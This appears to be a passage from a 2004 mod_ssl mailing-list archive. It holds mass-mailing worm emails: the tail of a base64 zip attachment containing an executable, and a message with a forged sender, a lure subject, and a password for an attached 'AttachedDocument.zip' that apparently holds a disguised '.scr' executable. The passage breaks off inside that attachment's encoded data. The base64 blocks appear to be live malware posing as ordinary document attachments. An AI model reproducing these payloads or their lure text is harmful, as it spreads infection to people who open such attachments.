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


----------dcvfnpfbjpobxnouupwt--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  2 13:13:11 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A1A71A8A73; Tue,  2 Mar 2004 13:13:11 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from home (dhcp024-029-192-099.neo.rr.com [24.29.192.99])
	by master.modssl.org (Postfix) with SMTP id 61399A8A6B
	for ; Tue,  2 Mar 2004 13:12:58 +0100 (CET)
Date: Tue, 02 Mar 2004 07:12:56 -0500
To: modssl-users@modssl.org
Subject: Hey, dude, it's me ^_^ :P
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------lefnpftyfqgjxefxvoni"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------lefnpftyfqgjxefxvoni
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

I don't  bite, weah!

archive password: 61003

----------lefnpftyfqgjxefxvoni
Content-Type: application/octet-stream; name="AttachedDocument.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="AttachedDocument.zip"

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
